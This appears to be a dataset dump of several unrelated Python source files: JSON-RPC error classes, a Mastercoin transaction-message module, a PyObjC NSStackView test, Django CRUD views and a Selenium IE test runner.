        JSONRPCError.__init__(self, -32700, "Parse error", data)


class InvalidRequestError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32600, "Invalid Request", data)


class MethodNotFoundError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32601, "Method not found", data)


class InvalidParametersError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32602, "Invalid params", data)


class InternalError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32603, "Internal error", data)


class ApplicationError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32000, "Application error", data)


class JSONRPCAssertionError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32001, "Assertion error", data)


class JSONRPCNotImplementedError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32002, "Not Implemented", data)
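Each subclass above pins a fixed JSON-RPC error code onto the shared `JSONRPCError` base, and `json_equivalent()` yields the dict that becomes a response's `error` member. A minimal restatement of that pattern showing how the exception would be serialized into a full error response (the `error_response` envelope helper is an assumption modeled on JSON-RPC 2.0, not part of the source module):

```python
import json

class JSONRPCError(Exception):
    def __init__(self, code, msg, data=None):
        self.code = code
        self.message = msg
        self.data = data

    def json_equivalent(self):
        obj = {'code': self.code, 'message': self.message}
        if self.data is not None:
            obj['data'] = self.data
        return obj

class MethodNotFoundError(JSONRPCError):
    def __init__(self, data=None):
        JSONRPCError.__init__(self, -32601, "Method not found", data)

def error_response(exc, request_id):
    """Hypothetical envelope: wrap json_equivalent() in a JSON-RPC 2.0 error reply."""
    return json.dumps({'jsonrpc': '2.0', 'error': exc.json_equivalent(), 'id': request_id})

try:
    raise MethodNotFoundError("no handler for 'sum'")
except JSONRPCError as e:
    body = error_response(e, 7)
    print(body)
```

Catching on the base class is the point of the hierarchy: a dispatcher can raise any specific subclass and serialize it with one `except JSONRPCError` handler.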
# ---- message.py (repo maraoz/pymastercoin, Apache-2.0 license) ----
"""Mastercoin message models"""
from struct import pack

from embed import recover_bytes_from_address, embed_in_address, TESTNET

EXODUS_ADDRESS = "1EXoDusjGwvnjZUyKkxZ4UHEf77z6A5S4P" if not TESTNET else "mx4gSH1wfPdV7c9FNGxZLMGh1K4x43CVfT"
DACOINMINISTERS_IN_MSC = 100000000
EPSILON = float(0.00006)

CURR_ID_MASTERCOIN = 1
CURR_ID_TESTCOIN = 2
CURRENCIES = [None, CURR_ID_MASTERCOIN, CURR_ID_TESTCOIN]
CURRENCY_NAME = [None, "MasterCoin", "TestCoin"]

TX_TYPE_SIMPLESEND = 0


def build_data_simple_send(recipient, currency_id, ammount):
    recipient_seq = ord(recover_bytes_from_address(recipient)[1])
    data_seq = (recipient_seq - 1) % 256
    data_bytes = pack('!HIIQH', data_seq, TX_TYPE_SIMPLESEND, currency_id, ammount, 0)
    return data_bytes


class MastercoinMessage():
    """Generic Mastercoin Message."""

    @classmethod
    def simple_send(cls, sender, recipient, currency_id=CURR_ID_TESTCOIN, ammount=100000000):
        return cls(sender, recipient, build_data_simple_send(recipient, currency_id, ammount))

    def __init__(self, sender, reference, data):
        self.sender = sender
        self.reference = reference
        self.data = data

    def broadcast(self, bitcoin):
        """Subclasses should use the bitcoin-rpc client to broadcast the Mastercoin message"""
        raise NotImplementedError()


class MastercoinAddressMessage(MastercoinMessage):
    """Mastercoin message implementation using bitcoin address data encoding"""

    def broadcast(self, bitcoin):
        print "Broadcasting MasterCoin message. Raw data: %s" % self.data.encode("hex")
        data_address = embed_in_address(self.data)
        recover_bytes_from_address(data_address)  # check validity
        txs = {
            EXODUS_ADDRESS: EPSILON,
            self.reference: EPSILON,
            data_address: EPSILON  # TODO: take into account data larger than 20 bytes
        }
        account = bitcoin.getaccount(self.sender)
        print "About to send the following transactions, are you sure?"
        print "\tExodus:\t\t%s -> %s" % (EXODUS_ADDRESS, EPSILON)
        print "\tReference:\t%s -> %s" % (self.reference, EPSILON)
        print "\tData:\t\t%s -> %s" % (data_address, EPSILON)
        print "Press ENTER to continue or anything else to cancel."
        if raw_input() == "":
            data = bitcoin.sendmany(account, txs)
            return data


class MastercoinMultisigMessage(MastercoinMessage):
    """Mastercoin message implementation using multisig data encoding"""

    def broadcast(self, bitcoin):
        pubkeys = [
            "0491bba2510912a5bd37da1fb5b1673010e43d2c6d812c514e91bfa9f2eb129e1c183329db55bd868e209aac2fbc02cb33d98fe74bf23f0c235d6126b1d8334f86",
            "04865c40293a680cb9c020e7b1e106d8c1916d3cef99aa431a56d253e69256dac09ef122b1a986818a7cb624532f062c1d1f8722084861c5c3291ccffef4ec6874",
            "048d2455d2403e08708fc1f556002f1b6cd83f992d085097f9974ab08a28838f07896fbab08f39495e15fa6fad6edbfb1e754e35fa1c7844c41f322a1863d46213"
        ]
        print bitcoin.createmultisig(2, pubkeys)["address"]
eca2685c6a2dc613803d913695bf93b0bd5ab912 | 1,998 | py | Python | PyObjCTest/test_nsstackview.py | linuxfood/pyobjc-framework-Cocoa-test | 3475890f165ab26a740f13d5afe4c62b4423a140 | [
"MIT"
] | null | null | null | PyObjCTest/test_nsstackview.py | linuxfood/pyobjc-framework-Cocoa-test | 3475890f165ab26a740f13d5afe4c62b4423a140 | [
"MIT"
] | null | null | null | PyObjCTest/test_nsstackview.py | linuxfood/pyobjc-framework-Cocoa-test | 3475890f165ab26a740f13d5afe4c62b4423a140 | [
"MIT"
] | null | null | null | import AppKit
from PyObjCTools.TestSupport import TestCase, min_os_level, min_sdk_level
import objc
class TestNSStackView(TestCase):
    def testConstants(self):
        self.assertEqual(AppKit.NSUserInterfaceLayoutOrientationHorizontal, 0)
        self.assertEqual(AppKit.NSUserInterfaceLayoutOrientationVertical, 1)
        self.assertEqual(AppKit.NSStackViewGravityTop, 1)
        self.assertEqual(AppKit.NSStackViewGravityLeading, 1)
        self.assertEqual(AppKit.NSStackViewGravityCenter, 2)
        self.assertEqual(AppKit.NSStackViewGravityBottom, 3)
        self.assertEqual(AppKit.NSStackViewGravityTrailing, 3)
        self.assertEqual(AppKit.NSStackViewVisibilityPriorityMustHold, 1000.0)
        self.assertEqual(
            AppKit.NSStackViewVisibilityPriorityDetachOnlyIfNecessary, 900.0
        )
        self.assertEqual(AppKit.NSStackViewVisibilityPriorityNotVisible, 0.0)
        self.assertIsInstance(AppKit.NSStackViewSpacingUseDefault, float)
        self.assertEqual(AppKit.NSStackViewSpacingUseDefault, objc._FLT_MAX)
        self.assertEqual(AppKit.NSStackViewDistributionGravityAreas, -1)
        self.assertEqual(AppKit.NSStackViewDistributionFill, 0)
        self.assertEqual(AppKit.NSStackViewDistributionFillEqually, 1)
        self.assertEqual(AppKit.NSStackViewDistributionFillProportionally, 2)
        self.assertEqual(AppKit.NSStackViewDistributionEqualSpacing, 3)
        self.assertEqual(AppKit.NSStackViewDistributionEqualCentering, 4)

    @min_os_level("10.9")
    def testMethods(self):
        self.assertResultIsBOOL(AppKit.NSStackView.hasEqualSpacing)
        self.assertArgIsBOOL(AppKit.NSStackView.setHasEqualSpacing_, 0)

    @min_os_level("10.11")
    def testMethods10_11(self):
        self.assertResultIsBOOL(AppKit.NSStackView.detachesHiddenViews)
        self.assertArgIsBOOL(AppKit.NSStackView.setDetachesHiddenViews_, 0)

    @min_sdk_level("10.10")
    def testProtocolObjects(self):
        objc.protocolNamed("NSStackViewDelegate")
# sports/views.py (repo: ahmadabudames/Django-X, license: MIT)
from django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView
from django.urls import reverse_lazy
from .models import sports
# Create your views here.
class sportsListView(ListView):
    model = sports
    template_name = "sports_list.html"
    context_object_name = 'sports'


class sportsDetailView(DetailView):
    model = sports
    template_name = 'sports_detail.html'


class sportsCreateView(CreateView):
    model = sports
    template_name = 'sports_create.html'
    fields = ['title_field', 'purchaser_field', 'description_field']
    success_url = '/'


class sportsUpdateView(UpdateView):
    model = sports
    template_name = 'sports_update.html'
    fields = ['title_field', 'purchaser_field', 'description_field']


class sportsDeleteView(DeleteView):
    model = sports
    template_name = 'sports_delete.html'
    success_url = reverse_lazy('sports_list')
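These class-based views only work once routed in a `urls.py`. A hypothetical wiring sketch (the route patterns and every name except `sports_list`, which must match the `reverse_lazy('sports_list')` call above, are assumptions; Django 2+ `path()` syntax):

```python
# sports/urls.py (hypothetical wiring, not part of the original repo)
from django.urls import path
from .views import (
    sportsListView, sportsDetailView, sportsCreateView,
    sportsUpdateView, sportsDeleteView,
)

urlpatterns = [
    path("", sportsListView.as_view(), name="sports_list"),
    path("<int:pk>/", sportsDetailView.as_view(), name="sports_detail"),
    path("create/", sportsCreateView.as_view(), name="sports_create"),
    path("<int:pk>/update/", sportsUpdateView.as_view(), name="sports_update"),
    path("<int:pk>/delete/", sportsDeleteView.as_view(), name="sports_delete"),
]
```

The `<int:pk>` converter is what lets `DetailView`, `UpdateView`, and `DeleteView` look up the object by primary key.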
# ie/BHO/tests/runtests.py (repo: penciltim/selenium-ice, license: Apache-2.0)
import sys
sys.path.append("system")
# TODO: refactor to add support for running unit tests.
if __name__ == '__main__':
    if (len(sys.argv) == 2) and (sys.argv[1] == 'system'):
        print '\nIce Tester'
        print '----------------------------------------------------------------------\n'
        import doctest, unittest
        test_suite_type = sys.argv[1]
        if test_suite_type in ['system']:
            print '** Running system tests - system_test.txt'
            suite = doctest.DocFileSuite('system/system_test.txt', optionflags=doctest.ELLIPSIS)
            unittest.TextTestRunner().run(suite)
    else:
        print """
Ice Tester
Usage:
    When run as a script, testing options are available:
    $ python runtests.py [system]
"""